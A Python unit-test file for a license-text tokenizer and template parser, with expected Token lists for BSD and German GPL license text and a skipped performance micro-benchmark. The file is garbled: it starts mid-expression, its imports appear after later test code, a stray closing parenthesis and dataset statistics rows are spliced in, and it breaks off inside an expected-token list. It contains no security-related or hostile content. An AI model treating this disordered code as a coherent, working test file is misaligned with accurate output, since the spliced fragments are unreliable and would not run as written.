(Token(start=0, start_line=1, start_char=53, end_line=1, end_char=62, end=0, gap=0, value=u'materials'),
Token(start=0, start_line=1, start_char=63, end_line=1, end_char=71, end=0, gap=0, value=u'provided'),
Token(start=0, start_line=1, start_char=72, end_line=1, end_char=76, end=0, gap=0, value=u'with')),
(Token(start=0, start_line=1, start_char=63, end_line=1, end_char=71, end=0, gap=0, value=u'provided'),
Token(start=0, start_line=1, start_char=72, end_line=1, end_char=76, end=0, gap=0, value=u'with'),
Token(start=0, start_line=2, start_char=19, end_line=2, end_char=22, end=0, gap=0, value=u'the')),
(Token(start=0, start_line=1, start_char=72, end_line=1, end_char=76, end=0, gap=0, value=u'with'),
Token(start=0, start_line=2, start_char=19, end_line=2, end_char=22, end=0, gap=0, value=u'the'),
Token(start=0, start_line=2, start_char=23, end_line=2, end_char=35, end=0, gap=0, value=u'distribution'))
]
assert expected == result
def test_tokens_ngram_processor_with_gaps_merged_always_returns_4grams_when_requested(self):
lines = u'''Neither the name of {{10 the ORGANIZATION}} nor {{}}the
names {{}}of its contributors may materials provided with
the distribution.'''.splitlines()
unigrams = unigram_splitter(lines, splitter=template_splitter)
templated = template_processor(unigrams)
result = list(tokens_ngram_processor(templated, ngram_len=4))
expected = [
(Token(start=0, start_line=0, start_char=0, end_line=0, end_char=7, end=0, gap=0, value=u'neither'),
Token(start=0, start_line=0, start_char=8, end_line=0, end_char=11, end=0, gap=0, value=u'the'),
Token(start=0, start_line=0, start_char=12, end_line=0, end_char=16, end=0, gap=0, value=u'name'),
Token(start=0, start_line=0, start_char=17, end_line=0, end_char=19, end=0, gap=10, value=u'of')),
(Token(start=0, start_line=0, start_char=44, end_line=0, end_char=47, end=0, gap=5, value=u'nor'),),
(Token(start=0, start_line=0, start_char=52, end_line=0, end_char=55, end=0, gap=0, value=u'the'),
Token(start=0, start_line=1, start_char=19, end_line=1, end_char=24, end=0, gap=5, value=u'names')),
(Token(start=0, start_line=1, start_char=29, end_line=1, end_char=31, end=0, gap=0, value=u'of'),
Token(start=0, start_line=1, start_char=32, end_line=1, end_char=35, end=0, gap=0, value=u'its'),
Token(start=0, start_line=1, start_char=36, end_line=1, end_char=48, end=0, gap=0, value=u'contributors'),
Token(start=0, start_line=1, start_char=49, end_line=1, end_char=52, end=0, gap=0, value=u'may')),
(Token(start=0, start_line=1, start_char=32, end_line=1, end_char=35, end=0, gap=0, value=u'its'),
Token(start=0, start_line=1, start_char=36, end_line=1, end_char=48, end=0, gap=0, value=u'contributors'),
Token(start=0, start_line=1, start_char=49, end_line=1, end_char=52, end=0, gap=0, value=u'may'),
Token(start=0, start_line=1, start_char=53, end_line=1, end_char=62, end=0, gap=0, value=u'materials')),
(Token(start=0, start_line=1, start_char=36, end_line=1, end_char=48, end=0, gap=0, value=u'contributors'),
Token(start=0, start_line=1, start_char=49, end_line=1, end_char=52, end=0, gap=0, value=u'may'),
Token(start=0, start_line=1, start_char=53, end_line=1, end_char=62, end=0, gap=0, value=u'materials'),
Token(start=0, start_line=1, start_char=63, end_line=1, end_char=71, end=0, gap=0, value=u'provided')),
(Token(start=0, start_line=1, start_char=49, end_line=1, end_char=52, end=0, gap=0, value=u'may'),
Token(start=0, start_line=1, start_char=53, end_line=1, end_char=62, end=0, gap=0, value=u'materials'),
Token(start=0, start_line=1, start_char=63, end_line=1, end_char=71, end=0, gap=0, value=u'provided'),
Token(start=0, start_line=1, start_char=72, end_line=1, end_char=76, end=0, gap=0, value=u'with')),
(Token(start=0, start_line=1, start_char=53, end_line=1, end_char=62, end=0, gap=0, value=u'materials'),
Token(start=0, start_line=1, start_char=63, end_line=1, end_char=71, end=0, gap=0, value=u'provided'),
Token(start=0, start_line=1, start_char=72, end_line=1, end_char=76, end=0, gap=0, value=u'with'),
Token(start=0, start_line=2, start_char=19, end_line=2, end_char=22, end=0, gap=0, value=u'the')),
(Token(start=0, start_line=1, start_char=63, end_line=1, end_char=71, end=0, gap=0, value=u'provided'),
Token(start=0, start_line=1, start_char=72, end_line=1, end_char=76, end=0, gap=0, value=u'with'),
Token(start=0, start_line=2, start_char=19, end_line=2, end_char=22, end=0, gap=0, value=u'the'),
Token(start=0, start_line=2, start_char=23, end_line=2, end_char=35, end=0, gap=0, value=u'distribution'))
]
assert expected == result
def test_tokens_ngram_processor_with_gaps_can_handle_contiguous_template_regions(self):
lines = u'''Neither the name of {{10 the ORGANIZATION}} nor {{}}
{{6 }}of its contributors may materials provided with the
distribution.'''.splitlines()
unigrams = unigram_splitter(lines, splitter=template_splitter)
templated = template_processor(unigrams)
result = list(tokens_ngram_processor(templated, ngram_len=4))
expected = [
(Token(start=0, start_line=0, start_char=0, end_line=0, end_char=7, end=0, gap=0, value=u'neither'),
Token(start=0, start_line=0, start_char=8, end_line=0, end_char=11, end=0, gap=0, value=u'the'),
Token(start=0, start_line=0, start_char=12, end_line=0, end_char=16, end=0, gap=0, value=u'name'),
Token(start=0, start_line=0, start_char=17, end_line=0, end_char=19, end=0, gap=10, value=u'of')),
(Token(start=0, start_line=0, start_char=44, end_line=0, end_char=47, end=0, gap=5, value=u'nor'),),
(Token(start=0, start_line=1, start_char=25, end_line=1, end_char=27, end=0, gap=0, value=u'of'),
Token(start=0, start_line=1, start_char=28, end_line=1, end_char=31, end=0, gap=0, value=u'its'),
Token(start=0, start_line=1, start_char=32, end_line=1, end_char=44, end=0, gap=0, value=u'contributors'),
Token(start=0, start_line=1, start_char=45, end_line=1, end_char=48, end=0, gap=0, value=u'may')),
(Token(start=0, start_line=1, start_char=28, end_line=1, end_char=31, end=0, gap=0, value=u'its'),
Token(start=0, start_line=1, start_char=32, end_line=1, end_char=44, end=0, gap=0, value=u'contributors'),
Token(start=0, start_line=1, start_char=45, end_line=1, end_char=48, end=0, gap=0, value=u'may'),
Token(start=0, start_line=1, start_char=49, end_line=1, end_char=58, end=0, gap=0, value=u'materials')),
(Token(start=0, start_line=1, start_char=32, end_line=1, end_char=44, end=0, gap=0, value=u'contributors'),
Token(start=0, start_line=1, start_char=45, end_line=1, end_char=48, end=0, gap=0, value=u'may'),
Token(start=0, start_line=1, start_char=49, end_line=1, end_char=58, end=0, gap=0, value=u'materials'),
Token(start=0, start_line=1, start_char=59, end_line=1, end_char=67, end=0, gap=0, value=u'provided')),
(Token(start=0, start_line=1, start_char=45, end_line=1, end_char=48, end=0, gap=0, value=u'may'),
Token(start=0, start_line=1, start_char=49, end_line=1, end_char=58, end=0, gap=0, value=u'materials'),
Token(start=0, start_line=1, start_char=59, end_line=1, end_char=67, end=0, gap=0, value=u'provided'),
Token(start=0, start_line=1, start_char=68, end_line=1, end_char=72, end=0, gap=0, value=u'with')),
(Token(start=0, start_line=1, start_char=49, end_line=1, end_char=58, end=0, gap=0, value=u'materials'),
Token(start=0, start_line=1, start_char=59, end_line=1, end_char=67, end=0, gap=0, value=u'provided'),
Token(start=0, start_line=1, start_char=68, end_line=1, end_char=72, end=0, gap=0, value=u'with'),
Token(start=0, start_line=1, start_char=73, end_line=1, end_char=76, end=0, gap=0, value=u'the')),
(Token(start=0, start_line=1, start_char=59, end_line=1, end_char=67, end=0, gap=0, value=u'provided'),
Token(start=0, start_line=1, start_char=68, end_line=1, end_char=72, end=0, gap=0, value=u'with'),
Token(start=0, start_line=1, start_char=73, end_line=1, end_char=76, end=0, gap=0, value=u'the'),
Token(start=0, start_line=2, start_char=19, end_line=2, end_char=31, end=0, gap=0, value=u'distribution'))
]
assert expected == result
def test_ngram_tokenizer_can_handle_gaps_at_end_of_text(self):
lines = [u'Neither the name of {{10 the ORGANIZATION}} ']
ngram_len = 2
result = list(ngram_tokenizer(lines, ngram_len, template=True))
expected = [
Token(start=0, start_line=0, start_char=0, end_line=0, end_char=11, end=1, gap=0, value=(u'neither', u'the')),
Token(start=1, start_line=0, start_char=8, end_line=0, end_char=16, end=2, gap=0, value=(u'the', u'name')),
Token(start=2, start_line=0, start_char=12, end_line=0, end_char=19, end=3, gap=10, value=(u'name', u'of'))
]
assert expected == result
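# doc_subset is used below to map a resulting Token's line/char span back onto
# the original lines; for a single-line input the round trip returns the line
# itself.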
def test_ngram_tokenizer_returns_correct_offsets_n3(self):
lines = [u'X11 License']
ngram_len = 3
result = list(ngram_tokenizer(lines, ngram_len))
assert lines == list(doc_subset(lines, result[0]))
expected = [Token(start=0, start_line=0, start_char=0, end_line=0, end_char=11, end=1, gap=0, value=(u'x11', u'license'))]
assert expected == result
def test_ngram_tokenizer_returns_correct_offsets_n1(self):
lines = [u'X11 License']
ngram_len = 1
result = list(ngram_tokenizer(lines, ngram_len))
expected = [
Token(start=0, start_line=0, start_char=0, end_line=0, end_char=3, end=0, gap=0, value=(u'x11',)),
Token(start=1, start_line=0, start_char=4, end_line=0, end_char=11, end=1, gap=0, value=(u'license',)),
]
assert expected == result
def test_ngram_tokenizer_returns_correct_offsets_template(self):
lines = [u'X11 License']
ngram_len = 3
result = list(ngram_tokenizer(lines, ngram_len, template=True))
assert lines == list(doc_subset(lines, result[0]))
expected = [Token(start=0, start_line=0, start_char=0, end_line=0, end_char=11, end=1, gap=0, value=(u'x11', u'license'))]
assert expected == result
def test_unicode_text_lines_handles_weird_xml_encodings(self):
test_file = self.get_test_loc('analysis/weird_encoding/easyconf-0.9.0.pom')
result = list(unicode_text_lines(test_file))
expected_file = self.get_test_loc('analysis/weird_encoding/easyconf-0.9.0.pom.expected')
with open(expected_file, 'rb') as tf:
expected = cPickle.load(tf)
assert expected == result
class TestMultigrams(FileBasedTesting):
test_data_dir = os.path.join(os.path.dirname(__file__), 'data')
# TODO: add more tests beyond the simple doctests that exist in the code
@skipIf(True, 'Performance tests only')
class TestAnalysisPerformance(FileBasedTesting):
test_data_dir = os.path.join(os.path.dirname(__file__), 'data')
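# Rough micro-benchmark (skipped by default): it times the unicode-aware word
# and template splitters from textcode.analysis against plain re-based
# finditer patterns and str.split/splitlines baselines via timeit. Note that
# setup1 and setup2 are identical, so the comparison simply runs twice.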
def test_splitter_perf(self):
test_file = self.get_test_loc('perf/test.txt')
text = open(test_file).read() * 100
utext = unicode(text)
setup1 = '''
import re
from textcode import analysis
unicode_ws = analysis.word_splitter
plain_ws = re.compile(r'[^\W_]+').finditer
unicode_ts = analysis.template_splitter
plain_ts = re.compile(r'(?:[^\W_])+|(?:\{\{)|(?:\}\})').finditer
text = %r
utext = %r''' % (text, utext)
def check_perf(setup):
from timeit import timeit
stmt = 'list(w for w in %s(%s))'
print()
print('Unicode template')
print(timeit(stmt % ('unicode_ts', 'utext'), setup=setup, number=1000))
print('Plain template')
print(timeit(stmt % ('plain_ts', 'text'), setup=setup, number=1000))
print('Unicode words')
print(timeit(stmt % ('unicode_ws', 'utext'), setup=setup, number=1000))
print('Plain words')
print(timeit(stmt % ('plain_ws', 'text'), setup=setup, number=1000))
print('Plain split')
print(timeit('text.split()', setup=setup, number=1000))
print('Unicode split')
print(timeit('utext.split()', setup=setup, number=1000))
print('Line split')
print(timeit('text.splitlines(False)', setup=setup, number=1000))
print('Line split with ends')
print(timeit('text.splitlines(True)', setup=setup, number=1000))
check_perf(setup=setup1)
setup2 = '''
import re
from textcode import analysis
unicode_ws = analysis.word_splitter
plain_ws = re.compile(r'[^\W_]+').finditer
unicode_ts = analysis.template_splitter
plain_ts = re.compile(r'(?:[^\W_])+|(?:\{\{)|(?:\}\})').finditer
text = %r
utext = %r''' % (text, utext)
check_perf(setup=setup2)
| 63.972603
| 143
| 0.649402
|
from __future__ import absolute_import, print_function
import json
import os
import codecs
import cPickle
from unittest.case import skipIf
from commoncode.testcase import FileBasedTesting
from textcode.analysis import DEFAULT_GAP
from textcode.analysis import NO_GAP
from textcode.analysis import InvalidGapError
from textcode.analysis import UnbalancedTemplateError
from textcode.analysis import Token
from textcode.analysis import word_splitter
from textcode.analysis import unigram_splitter
from textcode.analysis import unigram_tokenizer
from textcode.analysis import position_processor
from textcode.analysis import template_splitter
from textcode.analysis import template_processor
from textcode.analysis import ngram_to_token
from textcode.analysis import ngram_tokenizer
from textcode.analysis import tokens_ngram_processor
from textcode.analysis import doc_subset
from textcode.analysis import unicode_text_lines
from textcode.analysis import text_lines
)
result = [t.value for t in tst]
assert expected == result
class TestTemplates(FileBasedTesting):
test_data_dir = os.path.join(os.path.dirname(__file__), 'data')
def template_parsing(self, lines):
if isinstance(lines, basestring):
lines = lines.splitlines()
unigrams = unigram_splitter(lines, splitter=template_splitter)
return list(template_processor(unigrams))
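# Template regions use the "{{N words}}" syntax exercised below: the number is
# the gap recorded on the token preceding the region, "{{...}}" without a
# number falls back to DEFAULT_GAP, and (per these tests) 150 is the largest
# accepted gap while 151 raises InvalidGapError. Roughly:
#   u'ab{{10 nexb Company}}cd'  ->  Token('ab', gap=10), Token('cd', gap=NO_GAP)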
def test_process_template_handles_empty_templates_using_default_gap(self):
lines = [u'ab{{}}cd']
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=DEFAULT_GAP),
Token(start_line=0, end_line=0, start_char=6, end_char=8, value=u'cd', gap=NO_GAP)
]
assert expected == self.template_parsing(lines)
def test_process_template_recognizes_template_with_gap(self):
lines = u'ab{{10 nexb Company}}cd'
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=10),
Token(start_line=0, end_line=0, start_char=21, end_char=23, value=u'cd', gap=NO_GAP)
]
assert expected == self.template_parsing(lines)
def test_process_template_raise_invalid_gap_exception(self):
lines = u'ab{{151 nexb Company}}cd'
self.assertRaises(InvalidGapError, self.template_parsing, lines)
def test_process_template_recognizes_template_with_maxgap(self):
lines = u'ab{{150 nexb Company}}cd'
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=150),
Token(start_line=0, end_line=0, start_char=22, end_char=24, value=u'cd', gap=NO_GAP)
]
assert expected == self.template_parsing(lines)
def test_process_template_recognizes_template_with_only_gap(self):
lines = u'ab{{10}}cd'
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=10),
Token(start_line=0, end_line=0, start_char=8, end_char=10, value=u'cd', gap=NO_GAP)
]
assert expected == self.template_parsing(lines)
def test_process_template_recognizes_template_with_only_gap_and_spaces(self):
lines = u'ab{{ 10 }}cd'
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=10),
Token(start_line=0, end_line=0, start_char=16, end_char=18, value=u'cd', gap=NO_GAP)
]
assert expected == self.template_parsing(lines)
def test_process_template_set_default_gap_if_none_is_specified(self):
lines = u'ab{{nexb Company}}cd'
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=DEFAULT_GAP),
Token(start_line=0, end_line=0, start_char=18, end_char=20, value=u'cd', gap=NO_GAP)
]
assert expected == self.template_parsing(lines)
def test_process_template_set_default_gap_if_none_is_specified_ignoring_spaces(self):
lines = u'ab{{ \sdsdnexb Companysd }}cd'
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=DEFAULT_GAP),
Token(start_line=0, end_line=0, start_char=28, end_char=30, value=u'cd', gap=NO_GAP)
]
assert expected == self.template_parsing(lines)
def test_process_template_can_process_multiple_templatized_regions_with_default_gap(self):
lines = u'ab{{nexb Company}}cd {{second}}ef'
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=DEFAULT_GAP),
Token(start_line=0, end_line=0, start_char=18, end_char=20, value=u'cd', gap=DEFAULT_GAP),
Token(start_line=0, end_line=0, start_char=31, end_char=33, value=u'ef', gap=NO_GAP),
]
assert expected == self.template_parsing(lines)
def test_process_template_can_process_multiple_templatized_regions_with_default_gap_and_custom_gaps(self):
lines = u'ab{{nexb Company}}cd{{12 second}}ef{{12 second}}gh'
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=DEFAULT_GAP),
Token(start_line=0, end_line=0, start_char=18, end_char=20, value=u'cd', gap=12),
Token(start_line=0, end_line=0, start_char=33, end_char=35, value=u'ef', gap=12),
Token(start_line=0, end_line=0, start_char=48, end_char=50, value=u'gh', gap=NO_GAP),
]
assert expected == self.template_parsing(lines)
def test_process_template_handles_combination_of_well_formed_and_ill_formed_templates(self):
lines = u'ab{{c}}d}}ef'
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=DEFAULT_GAP),
Token(start_line=0, end_line=0, start_char=7, end_char=8, value=u'd', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=10, end_char=12, value=u'ef', gap=NO_GAP),
]
assert expected == self.template_parsing(lines)
def test_process_template_handles_empty_lines(self):
lines = u'\n\n'
expected = []
assert expected == self.template_parsing(lines)
def test_process_template_handles_None(self):
lines = None
expected = []
assert expected == self.template_parsing(lines)
def test_process_template_can_parse_simple_line(self):
lines = u'Licensed by {{12 nexB}} to you '
expected = u'licensed by to you'
result = u' '.join(x.value for x in self.template_parsing(lines))
assert expected == result
def test_process_template_does_not_throw_exception_for_illegal_pystache_templates(self):
lines = u'''Permission to use, copy, modify, and {{ /or : the
lines exist without or }} distribute this software...'''
self.template_parsing(lines)
def test_process_template_handles_unicode_text_correctly(self):
expected = [
Token(start_line=0, end_line=0, start_char=1, end_char=4, value=u'ist', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=5, end_char=10, value=u'freie', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=11, end_char=19, value=u'software', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=21, end_char=24, value=u'sie', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=25, end_char=31, value=u'k\xf6nnen', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=32, end_char=34, value=u'es', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=35, end_char=40, value=u'unter', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=41, end_char=44, value=u'den', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=45, end_char=56, value=u'bedingungen', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=57, end_char=60, value=u'der', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=61, end_char=64, value=u'gnu', gap=NO_GAP),
Token(start_line=1, end_line=1, start_char=1, end_char=8, value=u'general', gap=NO_GAP),
Token(start_line=1, end_line=1, start_char=10, end_char=11, value=u'n', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=1, end_char=7, value=u'public', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=8, end_char=15, value=u'license', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=17, end_char=20, value=u'wie', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=21, end_char=24, value=u'von', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=25, end_char=28, value=u'der', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=29, end_char=33, value=u'free', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=34, end_char=42, value=u'software', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=43, end_char=53, value=u'foundation', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=54, end_char=68, value=u'ver\xf6ffentlicht', gap=NO_GAP),
Token(start_line=3, end_line=3, start_char=1, end_char=12, value=u'weitergeben', gap=NO_GAP),
Token(start_line=3, end_line=3, start_char=13, end_char=16, value=u'und', gap=NO_GAP),
Token(start_line=3, end_line=3, start_char=17, end_char=21, value=u'oder', gap=NO_GAP),
Token(start_line=3, end_line=3, start_char=23, end_char=24, value=u'n', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=1, end_char=13, value=u'modifizieren', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=15, end_char=23, value=u'entweder', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=24, end_char=29, value=u'gem\xe4\xdf', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=30, end_char=37, value=u'version', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=38, end_char=39, value=u'3', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=40, end_char=43, value=u'der', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=44, end_char=50, value=u'lizenz', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=51, end_char=55, value=u'oder', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=57, end_char=61, value=u'nach', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=62, end_char=67, value=u'ihrer', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=68, end_char=74, value=u'option', gap=NO_GAP),
Token(start_line=5, end_line=5, start_char=1, end_char=6, value=u'jeder', gap=NO_GAP),
Token(start_line=5, end_line=5, start_char=7, end_char=15, value=u'sp\xe4teren', gap=NO_GAP),
Token(start_line=5, end_line=5, start_char=17, end_char=18, value=u'n', gap=NO_GAP),
Token(start_line=6, end_line=6, start_char=1, end_char=8, value=u'version', gap=NO_GAP),
Token(start_line=6, end_line=6, start_char=10, end_char=11, value=u'n', gap=NO_GAP),
Token(start_line=7, end_line=7, start_char=2, end_char=3, value=u'n', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=1, end_char=4, value=u'die', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=5, end_char=21, value=u'ver\xf6ffentlichung', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=22, end_char=25, value=u'von', gap=DEFAULT_GAP),
Token(start_line=8, end_line=8, start_char=38, end_char=45, value=u'erfolgt', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=46, end_char=48, value=u'in', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=49, end_char=52, value=u'der', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=53, end_char=61, value=u'hoffnung', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=63, end_char=66, value=u'da\xdf', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=67, end_char=69, value=u'es', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=70, end_char=75, value=u'ihnen', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=76, end_char=79, value=u'von', gap=NO_GAP),
Token(start_line=9, end_line=9, start_char=1, end_char=7, value=u'nutzen', gap=NO_GAP),
Token(start_line=9, end_line=9, start_char=9, end_char=10, value=u'n', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=1, end_char=5, value=u'sein', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=6, end_char=10, value=u'wird', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=12, end_char=16, value=u'aber', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=17, end_char=21, value=u'ohne', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=22, end_char=32, value=u'irgendeine', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=33, end_char=41, value=u'garantie', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=43, end_char=48, value=u'sogar', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=49, end_char=53, value=u'ohne', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=54, end_char=57, value=u'die', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=58, end_char=67, value=u'implizite', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=68, end_char=76, value=u'garantie', gap=NO_GAP),
Token(start_line=11, end_line=11, start_char=1, end_char=4, value=u'der', gap=NO_GAP),
Token(start_line=11, end_line=11, start_char=5, end_char=15, value=u'marktreife', gap=NO_GAP),
Token(start_line=11, end_line=11, start_char=17, end_char=18, value=u'n', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=1, end_char=5, value=u'oder', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=6, end_char=9, value=u'der', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=10, end_char=24, value=u'verwendbarkeit', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=25, end_char=28, value=u'f\xfcr', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=29, end_char=34, value=u'einen', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=35, end_char=45, value=u'bestimmten', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=46, end_char=51, value=u'zweck', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=53, end_char=60, value=u'details', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=61, end_char=67, value=u'finden', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=68, end_char=71, value=u'sie', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=72, end_char=74, value=u'in', gap=NO_GAP),
Token(start_line=13, end_line=13, start_char=1, end_char=4, value=u'der', gap=NO_GAP),
Token(start_line=13, end_line=13, start_char=5, end_char=8, value=u'gnu', gap=NO_GAP),
Token(start_line=13, end_line=13, start_char=9, end_char=16, value=u'general', gap=NO_GAP),
Token(start_line=13, end_line=13, start_char=18, end_char=19, value=u'n', gap=NO_GAP),
Token(start_line=14, end_line=14, start_char=1, end_char=7, value=u'public', gap=NO_GAP),
Token(start_line=14, end_line=14, start_char=8, end_char=15, value=u'license', gap=NO_GAP),
Token(start_line=14, end_line=14, start_char=17, end_char=18, value=u'n', gap=NO_GAP),
Token(start_line=15, end_line=15, start_char=2, end_char=3, value=u'n', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=1, end_char=4, value=u'sie', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=5, end_char=12, value=u'sollten', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=13, end_char=16, value=u'ein', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=17, end_char=25, value=u'exemplar', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=26, end_char=29, value=u'der', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=30, end_char=33, value=u'gnu', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=34, end_char=41, value=u'general', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=42, end_char=48, value=u'public', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=49, end_char=56, value=u'license', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=57, end_char=65, value=u'zusammen', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=66, end_char=69, value=u'mit', gap=DEFAULT_GAP),
Token(start_line=17, end_line=17, start_char=2, end_char=3, value=u'n', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=1, end_char=9, value=u'erhalten', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=10, end_char=15, value=u'haben', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=17, end_char=22, value=u'falls', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=23, end_char=28, value=u'nicht', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=30, end_char=39, value=u'schreiben', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=40, end_char=43, value=u'sie', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=44, end_char=46, value=u'an', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=47, end_char=50, value=u'die', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=51, end_char=55, value=u'free', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=56, end_char=64, value=u'software', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=65, end_char=75, value=u'foundation', gap=NO_GAP),
Token(start_line=19, end_line=19, start_char=2, end_char=3, value=u'n', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=1, end_char=4, value=u'inc', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=7, end_char=9, value=u'51', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=10, end_char=18, value=u'franklin', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=19, end_char=21, value=u'st', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=23, end_char=28, value=u'fifth', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=29, end_char=34, value=u'floor', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=36, end_char=42, value=u'boston', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=44, end_char=46, value=u'ma', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=47, end_char=52, value=u'02110', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=54, end_char=57, value=u'usa', gap=NO_GAP),
]
test_file = self.get_test_loc('analysis/unicode/12180.atxt')
with codecs.open(test_file, encoding='utf-8') as test:
lines = test.read().splitlines()
result = list(self.template_parsing(lines))
assert expected == result
def test_process_template_can_handle_long_text(self):
expected = [
Token(start_line=0, end_line=0, start_char=14, end_char=17, value=u'ist', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=18, end_char=23, value=u'freie', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=24, end_char=32, value=u'software', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=34, end_char=37, value=u'sie', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=38, end_char=44, value=u'k\xf6nnen', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=45, end_char=47, value=u'es', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=48, end_char=53, value=u'unter', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=54, end_char=57, value=u'den', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=58, end_char=69, value=u'bedingungen', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=70, end_char=73, value=u'der', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=74, end_char=77, value=u'gnu', gap=NO_GAP),
Token(start_line=1, end_line=1, start_char=1, end_char=8, value=u'general', gap=NO_GAP),
Token(start_line=1, end_line=1, start_char=10, end_char=11, value=u'n', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=1, end_char=7, value=u'public', gap=NO_GAP),
